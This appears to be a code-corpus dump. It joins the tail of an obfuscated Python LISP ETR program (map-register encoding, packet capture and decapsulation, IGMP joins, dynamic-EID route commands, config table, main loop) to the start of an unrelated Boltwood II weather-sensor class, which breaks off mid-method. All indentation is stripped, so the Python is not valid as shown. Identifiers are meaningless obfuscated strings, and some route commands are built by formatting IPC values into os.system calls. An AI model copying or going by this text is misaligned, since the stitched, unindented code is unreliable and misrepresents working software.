iiI1iI111ii1i = lisp . lisp_rloc_record ( )
iiI1iI111ii1i . rloc . copy_address ( iII1i11IIi1i )
iiI1iI111ii1i . priority = 254
iiI1iI111ii1i . rloc_name = "RTR"
iiI1iI111ii1i . weight = 0
iiI1iI111ii1i . mpriority = 255
iiI1iI111ii1i . mweight = 0
iiI1iI111ii1i . local_bit = False
iiI1iI111ii1i . reach_bit = True
iI1iIii11Ii += iiI1iI111ii1i . encode ( )
iiI1iI111ii1i . print_record ( " RTR " )
o0o0oOoOO0O [ i1i1IIIIi1i ] [ 0 ] += iI1iIii11Ii
oo000 = lisp . lisp_map_register ( )
oo000 . nonce = 0xaabbccdddfdfdf00
oo000 . xtr_id_present = True
oo000 . proxy_reply_requested = True
oo000 . map_notify_requested = False
oo000 . merge_register_requested = True
for OoO000 in list ( lisp . lisp_map_servers_list . values ( ) ) :
iii1III1i = OoO000 . dns_name if oOOO0oo0 else OoO000 . ms_name
if ( iii1III1i not in o0o0oOoOO0O ) : continue
oo000 . record_count = o0o0oOoOO0O [ iii1III1i ] [ 1 ]
if ( oo000 . record_count == 0 ) : continue
oo000 . nonce += 1
oo000 . alg_id = OoO000 . alg_id
  oo000 . key_id = OoO000 . key_id
oo000 . xtr_id = OoO000 . xtr_id
oo000 . site_id = OoO000 . site_id
oo000 . encrypt_bit = ( OoO000 . ekey != None )
OooOOOOoO00OoOO = oo000 . encode ( )
oo000 . print_map_register ( )
OO000oooo0 = oo000 . encode_xtr_id ( b"" )
OooOOOOoO00OoOO = OooOOOOoO00OoOO + iI1iIii11Ii + OO000oooo0
OoO000 . map_registers_multicast_sent += 1
lisp . lisp_send_map_register ( lisp_sockets , OooOOOOoO00OoOO , oo000 , OoO000 )
OoO000 . resolve_dns_name ( )
time . sleep ( .001 )
return
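#
# Packet-capture callback for the ETR data plane: strips the capture
# header, diverts IGMP to the multicast-register path and RLOC-probes to
# the control plane, then decapsulates the LISP packet and forwards or
# bridges the inner frame (inferred from the lisp calls in the body).
#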
def i1II11Iii1I ( parms , not_used , packet ) :
global Ooo , o0oOoO00o
iIi1Ii = parms [ 0 ]
i1 = parms [ 1 ]
if ( lisp . lisp_is_macos ( ) == False ) :
IIi1iI = 4 if iIi1Ii == "lo0" else 16
packet = packet [ IIi1iI : : ]
oo = struct . unpack ( "B" , packet [ 9 : 10 ] ) [ 0 ]
if ( oo == 2 ) :
o0oOOO0 = lisp . lisp_process_igmp_packet ( packet )
if ( type ( o0oOOO0 ) != bool ) :
oOoOOOo ( o0oOoO00o , o0oOOO0 )
return
OOoOoo00Oo = packet
packet , ooooooo00o , Iiii1iiiIiI1 , I11Iii1 = lisp . lisp_is_rloc_probe ( packet , 0 )
if ( OOoOoo00Oo != packet ) :
if ( ooooooo00o == None ) : return
lisp . lisp_parse_packet ( o0oOoO00o , packet , ooooooo00o , Iiii1iiiIiI1 , I11Iii1 )
return
if ( struct . unpack ( "B" , packet [ 0 : 1 ] ) [ 0 ] & 0xf0 == 0x40 ) :
I11I1i1iI = socket . ntohs ( struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ] )
if ( lisp . lisp_nat_traversal and I11I1i1iI == lisp . LISP_DATA_PORT ) : return
packet = lisp . lisp_reassemble ( packet )
if ( packet == None ) : return
packet = lisp . lisp_packet ( packet )
i1i1 = packet . decode ( True , Ooo , lisp . lisp_decap_stats )
if ( i1i1 == None ) : return
packet . print_packet ( "Receive" , True )
if ( lisp . lisp_decent_push_configured and
packet . inner_dest . is_multicast_address ( ) and packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
ooooooo00o = packet . inner_source . print_address_no_iid ( )
packet . strip_outer_headers ( )
packet = packet . packet [ 28 : : ]
packet = lisp . lisp_packet_ipc ( packet , ooooooo00o , I11I1i1iI )
lisp . lisp_ipc ( packet , Ooo , "lisp-ms" )
return
if ( packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
iiIiII11i1 = packet . packet [ 36 : : ]
oOo00Ooo0o0 = iiIiII11i1 [ 28 : : ]
I11Iii1 = - 1
if ( lisp . lisp_is_rloc_probe_request ( oOo00Ooo0o0 [ 0 : 1 ] ) ) :
I11Iii1 = struct . unpack ( "B" , iiIiII11i1 [ 8 : 9 ] ) [ 0 ] - 1
ooooooo00o = packet . outer_source . print_address_no_iid ( )
lisp . lisp_parse_packet ( o0oOoO00o , oOo00Ooo0o0 , ooooooo00o , 0 , I11Iii1 )
return
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( packet . packet ) )
packet . strip_outer_headers ( )
iIIi11 = lisp . bold ( "Forward" , False )
OOOoO0 = False
oo0oo = packet . inner_dest . is_mac ( )
if ( oo0oo ) :
packet . packet = lisp . lisp_mac_input ( packet . packet )
if ( packet . packet == None ) : return
iIIi11 = lisp . bold ( "Bridge" , False )
elif ( packet . inner_version == 4 ) :
OOOoO0 , packet . packet = lisp . lisp_ipv4_input ( packet . packet )
if ( packet . packet == None ) : return
if ( OOOoO0 ) :
o0oOOO0 = lisp . lisp_process_igmp_packet ( packet . packet )
if ( type ( o0oOOO0 ) != bool ) :
oOoOOOo ( o0oOoO00o , o0oOOO0 )
return
packet . inner_ttl = packet . outer_ttl
elif ( packet . inner_version == 6 ) :
packet . packet = lisp . lisp_ipv6_input ( packet )
if ( packet . packet == None ) : return
packet . inner_ttl = packet . outer_ttl
else :
lisp . dprint ( "Cannot parse inner packet header" )
return
if ( packet . inner_dest . is_multicast_address ( ) == False ) :
O0oOoOO = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( O0oOoOO ) :
O0oOoOO . increment_decap_stats ( packet )
else :
lisp . dprint ( "No database-mapping found for EID {}" . format ( lisp . green ( packet . inner_dest . print_address ( ) , False ) ) )
return
else :
if ( lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_source , False ) ) :
lisp . dprint ( "Discard echoed multicast packet (through NAT)" )
return
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet , ed = "decap" ) == False ) : return
i1Ii = "{} -> {}" . format ( packet . inner_source . print_address ( ) ,
packet . inner_dest . print_address ( ) )
lisp . dprint ( "{} packet for EIDs {}: {} ..." . format ( iIIi11 , lisp . green ( i1Ii , False ) ,
lisp . lisp_format_packet ( packet . packet [ 0 : 60 ] ) ) )
if ( oo0oo ) :
packet . bridge_l2_packet ( packet . inner_dest , O0oOoOO )
return
if ( packet . inner_version == 6 ) :
packet . send_l2_packet ( oOOoo00O0O , i1111 )
return
Iii = packet . get_raw_socket ( )
if ( Iii == None ) : Iii = i1
packet . send_packet ( Iii , packet . inner_dest )
return
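# Ooo0oO(): data-plane entry point for LISP packets punted from the kernel
# path (received on the listen socket rather than via pcap). It mirrors the
# pcap handler above: decode the header, hand decent-push and control packets
# to lisp-ms or the control plane, then decapsulate and forward the inner packet.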
def Ooo0oO ( lisp_raw_socket , packet , source ) :
global Ooo , o0oOoO00o
Oo0 = packet
packet = lisp . lisp_packet ( packet [ 8 : : ] )
if ( packet . lisp_header . decode ( Oo0 ) == False ) : return
packet . outer_source = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , source ,
lisp . LISP_IPV4_HOST_MASK_LEN , 0 )
i1i1 = packet . decode ( False , Ooo ,
lisp . lisp_decap_stats )
if ( i1i1 == None ) : return
if ( lisp . lisp_flow_logging ) : packet . log_flow ( False )
packet . print_packet ( "Kernel-decap" , False )
lisp . dprint ( packet . lisp_header . print_header ( " " ) )
if ( lisp . lisp_decent_push_configured and
packet . inner_dest . is_multicast_address ( ) and packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
I11I1i1iI = packet . udp_sport
packet = packet . packet [ 28 : : ]
packet = lisp . lisp_packet_ipc ( packet , source , I11I1i1iI )
lisp . lisp_ipc ( packet , Ooo , "lisp-ms" )
return
if ( packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
iiIiII11i1 = packet . packet
oOo00Ooo0o0 = iiIiII11i1 [ 28 : : ]
I11Iii1 = - 1
if ( lisp . lisp_is_rloc_probe_request ( oOo00Ooo0o0 [ 0 : 1 ] ) ) :
I11Iii1 = struct . unpack ( "B" , iiIiII11i1 [ 8 : 9 ] ) [ 0 ] - 1
lisp . lisp_parse_packet ( o0oOoO00o , oOo00Ooo0o0 , source , 0 , I11Iii1 )
return
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( packet . packet ) )
if ( packet . inner_dest . is_multicast_address ( ) == False ) :
O0oOoOO = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( O0oOoOO ) :
O0oOoOO . increment_decap_stats ( packet )
else :
lisp . dprint ( "No database-mapping found for EID {}" . format ( lisp . green ( packet . inner_dest . print_address ( ) , False ) ) )
else :
if ( lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_source , False ) ) :
lisp . dprint ( "Discard echoed multicast packet" )
return
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet , ed = "decap" ) == False ) : return
i1Ii = "{} -> {}" . format ( packet . inner_source . print_address ( ) ,
packet . inner_dest . print_address ( ) )
lisp . dprint ( "{} packet for EIDs {}: {} ..." . format ( lisp . bold ( "NAT-Forward" , False ) , lisp . green ( i1Ii , False ) ,
lisp . lisp_format_packet ( packet . packet [ 0 : 60 ] ) ) )
if ( packet . inner_version == 6 ) :
packet . send_l2_packet ( oOOoo00O0O , i1111 )
return
Iii = packet . get_raw_socket ( )
if ( Iii == None ) : Iii = lisp_raw_socket
packet . send_packet ( Iii , packet . inner_dest )
return
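# i111I11I(): given a multicast group address, look up its configured sources
# and hand an (source, group, join/leave) list to the IGMP IPC handler oOoOOOo().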
def i111I11I ( group , joinleave ) :
ii111Ii11iii = lisp . lisp_lookup_group ( group )
if ( ii111Ii11iii == None ) : return
I1i = [ ]
for OO0Oooo0oOO0O in ii111Ii11iii . sources :
I1i . append ( [ OO0Oooo0oOO0O , group , joinleave ] )
oOoOOOo ( o0oOoO00o , I1i )
return
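# i11ii(): background thread that watches for join-<group>/leave-<group> files
# and turns them into group-membership changes. IPv6 groups go through
# i111I11I(); for IPv4 groups a canned IGMPv2 report/leave packet (built from
# the II11iiI header template below) is synthesized and fed to
# lisp.lisp_process_igmp_packet().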
def i11ii ( ) :
global o0oOoO00o
lisp . lisp_set_exception ( )
I1IiII1I1i1I1 = socket . htonl
II11iiI = [ I1IiII1I1i1I1 ( 0x46000020 ) , I1IiII1I1i1I1 ( 0x9fe60000 ) , I1IiII1I1i1I1 ( 0x0102d7cc ) ,
I1IiII1I1i1I1 ( 0x0acfc15a ) , I1IiII1I1i1I1 ( 0xe00000fb ) , I1IiII1I1i1I1 ( 0x94040000 ) ]
OooOOOOoO00OoOO = b""
for I1oo in II11iiI : OooOOOOoO00OoOO += struct . pack ( "I" , I1oo )
while ( True ) :
OoooOo0 = getoutput ( "ls join-*" ) . replace ( "join-" , "" )
OoooOo0 = OoooOo0 . split ( "\n" )
for oOO0oo in OoooOo0 :
if ( lisp . lisp_valid_address_format ( "address" , oOO0oo ) == False ) :
continue
oo00 = ( oOO0oo . find ( ":" ) != - 1 )
Ii1I1i1ii1I1 = os . path . exists ( "leave-{}" . format ( oOO0oo ) )
lisp . lprint ( "Internal {} group {}" . format ( "leaving" if Ii1I1i1ii1I1 else "joining" , oOO0oo ) )
if ( oo00 ) :
if ( oOO0oo . lower ( ) . find ( "ff02:" ) != - 1 ) :
lisp . lprint ( "Suppress registration for link-local groups" )
continue
i111I11I ( oOO0oo , ( Ii1I1i1ii1I1 == False ) )
else :
iI1IIiiIIIII = OooOOOOoO00OoOO
if ( Ii1I1i1ii1I1 ) :
iI1IIiiIIIII += struct . pack ( "I" , I1IiII1I1i1I1 ( 0x17000000 ) )
else :
iI1IIiiIIIII += struct . pack ( "I" , I1IiII1I1i1I1 ( 0x16000000 ) )
ii = oOO0oo . split ( "." )
Ooo0OOoOoO0 = int ( ii [ 0 ] ) << 24
Ooo0OOoOoO0 += int ( ii [ 1 ] ) << 16
Ooo0OOoOoO0 += int ( ii [ 2 ] ) << 8
Ooo0OOoOoO0 += int ( ii [ 3 ] )
iI1IIiiIIIII += struct . pack ( "I" , I1IiII1I1i1I1 ( Ooo0OOoOoO0 ) )
I1i = lisp . lisp_process_igmp_packet ( iI1IIiiIIIII )
if ( type ( I1i ) != bool ) :
oOoOOOo ( o0oOoO00o , I1i )
time . sleep ( 0.100 )
time . sleep ( 10 )
return
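# o0OO0oooo(): pcap capture thread. Builds a BPF filter matching this host's
# addresses and multicast RLEs on the LISP data/control ports (4341, 4342,
# 8472, 4789) and dispatches every captured frame to the packet handler
# i1II11Iii1I().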
def o0OO0oooo ( ) :
lisp . lisp_set_exception ( )
if ( lisp . lisp_myrlocs [ 0 ] == None ) : return
o0Ooo0o0Oo = lisp . lisp_get_all_multicast_rles ( )
iIi1Ii = "any"
oOoO = "(proto 2) or "
oOoO += "((dst host "
for iI1iI in lisp . lisp_get_all_addresses ( ) + o0Ooo0o0Oo :
oOoO += "{} or " . format ( iI1iI )
oOoO = oOoO [ 0 : - 4 ]
oOoO += ") and ((udp dst port 4341 or 8472 or 4789) or "
oOoO += "(udp src port 4341) or "
oOoO += "(udp dst port 4342 and ip[28] == 0x12) or "
oOoO += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + "(ip[6]&0xe0 == 0 and ip[7] != 0)))))"
lisp . lprint ( "Capturing packets for: '{}' on device {}" . format ( oOoO ,
iIi1Ii ) )
if ( lisp . lisp_is_python2 ( ) ) :
import pcappy
ooO0 = pcappy . open_live ( iIi1Ii , 1600 , 0 , 100 )
ooO0 . filter = oOoO
ooO0 . loop ( - 1 , i1II11Iii1I , [ iIi1Ii , i1 ] )
if ( lisp . lisp_is_python3 ( ) ) :
import pcapy
ooO0 = pcapy . open_live ( iIi1Ii , 1600 , 0 , 100 )
ooO0 . setfilter ( oOoO )
while ( True ) :
oooO , OooOOOOoO00OoOO = ooO0 . next ( )
i1II11Iii1I ( [ iIi1Ii , i1 ] , None , OooOOOOoO00OoOO )
return
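# I1II1IiI1(): ETR startup. Opens the data and IPC listen sockets plus a raw
# IPv4 send socket, optionally creates the lispers.net tuntap device for IPv6
# delivery, and starts the capture (o0OO0oooo) and IGMP (i11ii) threads.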
def I1II1IiI1 ( ) :
global Ooo
global Oo
global o0oOoO00o
global i1
global oOOoo00O0O
global i1111
lisp . lisp_i_am ( "etr" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "ETR starting up" )
lisp . lisp_get_local_interfaces ( )
lisp . lisp_get_local_macs ( )
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
OO0Oooo0oOO0O = lisp . lisp_open_listen_socket ( "0.0.0.0" , str ( I1Ii11I1Ii1i ) )
OO0Oooo0oOO0O . setsockopt ( socket . IPPROTO_IP , socket . IP_MULTICAST_TTL , 32 )
Oo = OO0Oooo0oOO0O
Ooo = lisp . lisp_open_listen_socket ( "" , "lisp-etr" )
o0oOoO00o [ 0 ] = Oo
o0oOoO00o [ 1 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV6 )
o0oOoO00o [ 2 ] = Ooo
i1 = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_RAW )
i1 . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
o0oOoO00o . append ( i1 )
if ( pytun != None ) :
i1111 = b'\x00\x00\x86\xdd'
iIi1Ii = "lispers.net"
try :
oOOoo00O0O = pytun . TunTapDevice ( flags = pytun . IFF_TUN ,
name = iIi1Ii )
os . system ( "ip link set dev {} up" . format ( iIi1Ii ) )
except :
lisp . lprint ( "Cannot create tuntap interface" )
threading . Thread ( target = o0OO0oooo , args = [ ] ) . start ( )
threading . Thread ( target = i11ii , args = [ ] ) . start ( )
return ( True )
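# iiI1iIII1ii(): ETR shutdown. Cancels the periodic timers and closes the
# sockets opened at startup.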
def iiI1iIII1ii ( ) :
global Oo0o
global Ii1iI
if ( Oo0o ) : Oo0o . cancel ( )
if ( Ii1iI ) : Ii1iI . cancel ( )
lisp . lisp_close_socket ( o0oOoO00o [ 0 ] , "" )
lisp . lisp_close_socket ( o0oOoO00o [ 1 ] , "" )
lisp . lisp_close_socket ( Ooo , "lisp-etr" )
return
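# I1Iiii(): process a "learn%<eid>%<interface>" IPC message from the ITR to
# register or deregister a dynamic-EID, keeping a kernel route in sync on
# non-macOS systems.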
def I1Iiii ( ipc ) :
ipc = ipc . split ( "%" )
iIIIIiiIii = ipc [ 1 ]
I1I1Iii1Iiii = ipc [ 2 ]
if ( I1I1Iii1Iiii == "None" ) : I1I1Iii1Iiii = None
i1OO0oOOoo = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
i1OO0oOOoo . store_address ( iIIIIiiIii )
O0oOoOO = lisp . lisp_db_for_lookups . lookup_cache ( i1OO0oOOoo , False )
if ( O0oOoOO == None or O0oOoOO . dynamic_eid_configured ( ) == False ) :
lisp . lprint ( "ITR/ETR dynamic-EID configuration out of sync for {}" . format ( lisp . green ( iIIIIiiIii , False ) ) )
return
I1IIIiI1I1ii1 = None
if ( iIIIIiiIii in O0oOoOO . dynamic_eids ) : I1IIIiI1I1ii1 = O0oOoOO . dynamic_eids [ iIIIIiiIii ]
if ( I1IIIiI1I1ii1 == None and I1I1Iii1Iiii == None ) :
lisp . lprint ( "ITR/ETR state mismatch for {}" . format ( lisp . green ( iIIIIiiIii , False ) ) )
return
if ( I1IIIiI1I1ii1 and I1I1Iii1Iiii ) :
if ( I1IIIiI1I1ii1 . interface == I1I1Iii1Iiii ) :
lisp . lprint ( "ITR sent redundant IPC for {}" . format ( lisp . green ( iIIIIiiIii , False ) ) )
else :
lisp . lprint ( "Dynamic-EID {} interface change, {} -> {}" . format ( lisp . green ( iIIIIiiIii , False ) , I1IIIiI1I1ii1 . interface , I1I1Iii1Iiii ) )
I1IIIiI1I1ii1 . interface = I1I1Iii1Iiii
return
if ( I1I1Iii1Iiii ) :
I1IIIiI1I1ii1 = lisp . lisp_dynamic_eid ( )
I1IIIiI1I1ii1 . dynamic_eid . copy_address ( i1OO0oOOoo )
I1IIIiI1I1ii1 . interface = I1I1Iii1Iiii
I1IIIiI1I1ii1 . get_timeout ( I1I1Iii1Iiii )
O0oOoOO . dynamic_eids [ iIIIIiiIii ] = I1IIIiI1I1ii1
o000 = lisp . bold ( "Registering" , False )
iIIIIiiIii = lisp . bold ( iIIIIiiIii , False )
lisp . lprint ( "{} dynamic-EID {} on interface {}, timeout {}" . format ( o000 ,
lisp . green ( iIIIIiiIii , False ) , I1I1Iii1Iiii , I1IIIiI1I1ii1 . timeout ) )
i1iiI11I ( o0oOoO00o , None , i1OO0oOOoo , None , False )
if ( lisp . lisp_is_macos ( ) == False ) :
iIIIIiiIii = i1OO0oOOoo . print_prefix_no_iid ( )
Ii1IiiiI1ii = "ip route add {} dev {}" . format ( iIIIIiiIii , I1I1Iii1Iiii )
os . system ( Ii1IiiiI1ii )
return
if ( iIIIIiiIii in O0oOoOO . dynamic_eids ) :
I1I1Iii1Iiii = O0oOoOO . dynamic_eids [ iIIIIiiIii ] . interface
o0O00O = lisp . bold ( "Deregistering" , False )
lisp . lprint ( "{} dynamic-EID {}" . format ( o0O00O ,
lisp . green ( iIIIIiiIii , False ) ) )
i1iiI11I ( o0oOoO00o , 0 , i1OO0oOOoo , None , False )
O0oOoOO . dynamic_eids . pop ( iIIIIiiIii )
if ( lisp . lisp_is_macos ( ) == False ) :
iIIIIiiIii = i1OO0oOOoo . print_prefix_no_iid ( )
Ii1IiiiI1ii = "ip route delete {} dev {}" . format ( iIIIIiiIii , I1I1Iii1Iiii )
os . system ( Ii1IiiiI1ii )
return
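# oOOoO0oO0oo0O(): process an "rtr%<address>%<up|down>" IPC message from the
# ITR, marking the RTR entry up or down in lisp.lisp_rtr_list.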
def oOOoO0oO0oo0O ( ipc ) :
if ( lisp . lisp_register_all_rtrs ) : return
IIi1i1I11IIII , o0OOOooo0OOo , i1i1 = ipc . split ( "%" )
if ( o0OOOooo0OOo not in lisp . lisp_rtr_list ) : return
lisp . lprint ( "Process ITR IPC message, RTR {} has gone {}" . format (
lisp . red ( o0OOOooo0OOo , False ) , lisp . bold ( i1i1 , False ) ) )
iII1i11IIi1i = lisp . lisp_rtr_list [ o0OOOooo0OOo ]
if ( i1i1 == "down" ) :
lisp . lisp_rtr_list [ o0OOOooo0OOo ] = None
return
iII1i11IIi1i = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , o0OOOooo0OOo , 32 , 0 )
lisp . lisp_rtr_list [ o0OOOooo0OOo ] = iII1i11IIi1i
return
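# Oo0OOOoOO(): process a "nonce%<R|E>%<rloc>%<nonce>" IPC message, recording
# request-nonce or echo-nonce state for the given RLOC.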
def Oo0OOOoOO ( ipc ) :
iiII1IIii1i1 , IIi1i1I11IIII , i1iiiIIi11II , o0oooOo0oo = ipc . split ( "%" )
o0oooOo0oo = int ( o0oooOo0oo , 16 )
IIi1II = lisp . lisp_get_echo_nonce ( None , i1iiiIIi11II )
if ( IIi1II == None ) : IIi1II = lisp . lisp_echo_nonce ( i1iiiIIi11II )
if ( IIi1i1I11IIII == "R" ) :
IIi1II . request_nonce_sent = o0oooOo0oo
lisp . lprint ( "Waiting for echo-nonce 0x{} from {}" . format ( lisp . lisp_hex_string ( o0oooOo0oo ) , lisp . red ( IIi1II . rloc_str , False ) ) )
elif ( IIi1i1I11IIII == "E" ) :
IIi1II . echo_nonce_sent = o0oooOo0oo
lisp . lprint ( "Sent echo-nonce 0x{} to {}" . format ( lisp . lisp_hex_string ( o0oooOo0oo ) , lisp . red ( IIi1II . rloc_str , False ) ) )
return
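# iiI111i1: command dispatch table mapping CLI/config clauses to their handler
# functions and per-keyword value constraints (consumed by lispconfig).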
iiI111i1 = {
"lisp xtr-parameters" : [ lispconfig . lisp_xtr_command , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"frame-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"register-reachable-rtrs" : [ True , "yes" , "no" ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp interface" : [ lispconfig . lisp_interface_command , {
"interface-name" : [ True ] ,
"device" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"dynamic-eid" : [ True ] ,
"dynamic-eid-device" : [ True ] ,
"lisp-nat" : [ True , "yes" , "no" ] ,
"dynamic-eid-timeout" : [ True , 0 , 0xff ] } ] ,
"lisp map-server" : [ OoooooOoo , {
"ms-name" : [ True ] ,
"address" : [ True ] ,
"dns-name" : [ True ] ,
"authentication-type" : [ False , "sha1" , "sha2" ] ,
"authentication-key" : [ False ] ,
"encryption-key" : [ False ] ,
"proxy-reply" : [ False , "yes" , "no" ] ,
"want-map-notify" : [ False , "yes" , "no" ] ,
"merge-registrations" : [ False , "yes" , "no" ] ,
"refresh-registrations" : [ False , "yes" , "no" ] ,
"site-id" : [ False , 1 , 0xffffffffffffffff ] } ] ,
"lisp database-mapping" : [ oo000OO00Oo , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"register-ttl" : [ True , 1 , 0xffffffff ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp geo-coordinates" : [ lispconfig . lisp_geo_command , {
"geo-name" : [ False ] ,
"geo-tag" : [ False ] } ] ,
"lisp json" : [ lispconfig . lisp_json_command , {
"json-name" : [ False ] ,
"json-string" : [ False ] } ] ,
"lisp group-mapping" : [ oO0o0o0oo , {
"group-name" : [ False ] ,
"ms-name" : [ True ] ,
"group-prefix" : [ False ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"rle-address" : [ False ] ,
"sources" : [ ] ,
"address" : [ True ] } ] ,
"show database-mapping" : [ o0o , { } ] ,
"show etr-keys" : [ oooOo0OOOoo0 , { } ] ,
"show etr-dynamic-eid" : [ lispconfig . lisp_show_dynamic_eid_command , { } ]
}
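# Main program: start the ETR (exit on failure), then select() over the data
# and IPC sockets, dispatching data packets, commands, and API requests until
# the process is told to exit.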
if ( I1II1IiI1 ( ) == False ) :
lisp . lprint ( "lisp_etr_startup() failed" )
lisp . lisp_print_banner ( "ETR abnormal exit" )
exit ( 1 )
Iiii = [ Oo , Ooo ]
while ( True ) :
try : I11iIiI1 , i1I1iiii1Ii11 , iiII1IIii1i1 = select . select ( Iiii , [ ] , [ ] )
except : break
if ( Oo in I11iIiI1 ) :
IIi1i1I11IIII , ooooooo00o , Iiii1iiiIiI1 , OooOOOOoO00OoOO = lisp . lisp_receive ( Oo , False )
if ( ooooooo00o == "" ) : break
if ( Iiii1iiiIiI1 == lisp . LISP_DATA_PORT ) :
Ooo0oO ( i1 , OooOOOOoO00OoOO , ooooooo00o )
else :
if ( lisp . lisp_is_rloc_probe_request ( OooOOOOoO00OoOO [ 0 : 1 ] ) ) :
lisp . lprint ( "ETR ignoring RLOC-probe request, using pcap" )
continue
IiI = lisp . lisp_parse_packet ( o0oOoO00o , OooOOOOoO00OoOO ,
ooooooo00o , Iiii1iiiIiI1 )
if ( IiI ) :
Ii1iI = threading . Timer ( 0 ,
oo0Oo00Oo0 , [ None ] )
Ii1iI . start ( )
Oo0o = threading . Timer ( 0 ,
iii11 , [ o0oOoO00o ] )
Oo0o . start ( )
if ( Ooo in I11iIiI1 ) :
IIi1i1I11IIII , ooooooo00o , Iiii1iiiIiI1 , OooOOOOoO00OoOO = lisp . lisp_receive ( Ooo , True )
if ( ooooooo00o == "" ) : break
if ( IIi1i1I11IIII == "command" ) :
OooOOOOoO00OoOO = OooOOOOoO00OoOO . decode ( )
if ( OooOOOOoO00OoOO . find ( "learn%" ) != - 1 ) :
I1Iiii ( OooOOOOoO00OoOO )
elif ( OooOOOOoO00OoOO . find ( "nonce%" ) != - 1 ) :
Oo0OOOoOO ( OooOOOOoO00OoOO )
elif ( OooOOOOoO00OoOO . find ( "clear%" ) != - 1 ) :
lispconfig . lisp_clear_decap_stats ( OooOOOOoO00OoOO )
elif ( OooOOOOoO00OoOO . find ( "rtr%" ) != - 1 ) :
oOOoO0oO0oo0O ( OooOOOOoO00OoOO )
elif ( OooOOOOoO00OoOO . find ( "stats%" ) != - 1 ) :
OooOOOOoO00OoOO = OooOOOOoO00OoOO . split ( "%" ) [ - 1 ]
lisp . lisp_process_data_plane_decap_stats ( OooOOOOoO00OoOO , None )
else :
lispconfig . lisp_process_command ( Ooo ,
IIi1i1I11IIII , OooOOOOoO00OoOO , "lisp-etr" , [ iiI111i1 ] )
elif ( IIi1i1I11IIII == "api" ) :
OooOOOOoO00OoOO = OooOOOOoO00OoOO . decode ( )
lisp . lisp_process_api ( "lisp-etr" , Ooo , OooOOOOoO00OoOO )
else :
if ( lisp . lisp_is_rloc_probe_request ( OooOOOOoO00OoOO [ 0 : 1 ] ) ) :
lisp . lprint ( "ETR ignoring RLOC-probe request, using pcap" )
continue
lisp . lisp_parse_packet ( o0oOoO00o , OooOOOOoO00OoOO , ooooooo00o , Iiii1iiiIiI1 )
iiI1iIII1ii ( )
lisp . lisp_print_banner ( "ETR normal exit" )
exit ( 0 )
|
boltwood.py
|
import logging
import threading
import time
from typing import List, Tuple

import serial
from . import api
from .report import Report, SensorsReport
class BoltwoodII:
"""Class that operates a Boltwood II cloud sensor weather station."""
def __init__(self, port: str = '/dev/ttyUSB0', baudrate: int = 4800, bytesize: int = 8, parity: str = 'N',
stopbits: int = 1, rtscts: bool = False, timeout: int = 10, *args, **kwargs):
"""
Args:
port: Serial port to use.
baudrate: Baud rate.
bytesize: Size of bytes.
parity: Parity.
stopbits: Stop bits.
rtscts: RTSCTS.
timeout: Timeout for reading [s].
*args:
**kwargs:
"""
# serial connection
self._conn = None
self._port = port
self._baudrate = baudrate
self._bytesize = bytesize
self._parity = parity
self._stopbits = stopbits
self._rtscts = rtscts
self._serial_timeout = timeout
# poll thread
self._closing = None
self._thread = None
self._thread_sleep = 1
self._max_thread_sleep = 900
# callback function
self._callback = None
def start_polling(self, callback):
